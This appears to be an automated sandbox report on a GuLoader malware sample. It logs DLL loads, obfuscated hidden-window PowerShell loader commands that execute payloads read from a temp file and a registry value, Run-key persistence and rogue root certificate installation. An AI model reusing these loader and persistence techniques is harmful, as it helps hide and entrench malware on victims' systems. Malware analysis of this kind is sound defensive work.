              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64win.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64cpu.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn2.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntdsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wow64win.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wow64cpu.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winbrand.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64win.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64cpu.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64win.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64cpu.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn2.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntdsapi.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wow64win.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wow64cpu.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winbrand.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wow64win.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wow64cpu.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: version.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: webio.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rpcrtremote.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: credssp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: bcrypt.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: shcore.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rstrtmgr.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ext-ms-win-kernel32-package-current-l1-1-0.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wow64win.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wow64cpu.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: version.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: secur32.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winhttp.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: webio.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iphlpapi.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winnsi.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dnsapi.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: nlaapi.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dhcpcsvc6.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dhcpcsvc.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rasadhlp.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptsp.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rpcrtremote.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: credssp.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ncrypt.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: bcrypt.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: gpapi.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winmm.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: shcore.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rstrtmgr.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ext-ms-win-kernel32-package-current-l1-1-0.dll
              Source: C:\Users\user\Desktop\documento.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32Jump to behavior
              Source: C:\Users\user\Desktop\documento.exeFile written: C:\Users\user\Documents\Illoyalitet.iniJump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
              Source: documento.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: Binary string: :\Windows\System.Core.pdbpdbore.pdb source: powershell.exe, 00000003.00000002.538026675.0000000005060000.00000004.00000020.00020000.00000000.sdmp

              Data Obfuscation

              barindex
              Yara detected GuLoader
              Source: Yara matchFile source: 00000013.00000002.791285733.00000000085E1000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000002.783334592.00000000083F1000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.538410512.000000000839B000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Obfuscated command line found
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c set /A 1^^0"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c set /A 1^^0"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c set /A 1^^0"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c set /A 1^^0"Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c set /A 1^^0"Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c set /A 1^^0"
              Suspicious powershell command line found
              Source: C:\Users\user\Desktop\documento.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Linksman=Get-Content 'C:\Users\user\AppData\Local\Temp\Deinotherium\Jordagtig138\Unmonotonous\Iraqian\Fermentatively.Bry';$Curiet136=$Linksman.SubString(57835,3);.$Curiet136($Linksman)"
              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -windowstyle minimized $Preeternal=(Get-ItemProperty -Path 'HKCU:\Morassweed\').Herbalize;c:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe ($Preeternal)
              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -windowstyle minimized $Preeternal=(Get-ItemProperty -Path 'HKCU:\Morassweed\').Herbalize;c:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe ($Preeternal)
              Source: C:\Users\user\Desktop\documento.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Linksman=Get-Content 'C:\Users\user\AppData\Local\Temp\Deinotherium\Jordagtig138\Unmonotonous\Iraqian\Fermentatively.Bry';$Curiet136=$Linksman.SubString(57835,3);.$Curiet136($Linksman)"Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_0026AB91 push es; retf 3_2_0026ABA7
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00262DE7 push ebx; ret 3_2_00262DEA
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_002625DD push ebx; retf 3_2_002625EA
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_0038AD38 push ecx; retf 15_2_0038D189
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_0038D180 push ecx; retf 15_2_0038D189

              Persistence and Installation Behavior

              barindex
              Installs new ROOT certificates
              Source: C:\Program Files (x86)\Windows Mail\wab.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\Deinotherium\Pugilist\Unreturnableness\Tapeta\Vulgare\documento.exeJump to dropped file
              Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Startup keyJump to behavior
              Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Startup keyJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOTJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
              Source: C:\Users\user\Desktop\documento.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\documento.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\documento.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\documento.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\documento.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\documento.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\documento.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\documento.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\documento.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\documento.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\documento.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\documento.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\documento.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\documento.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\documento.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\documento.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\documento.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\documento.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\documento.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
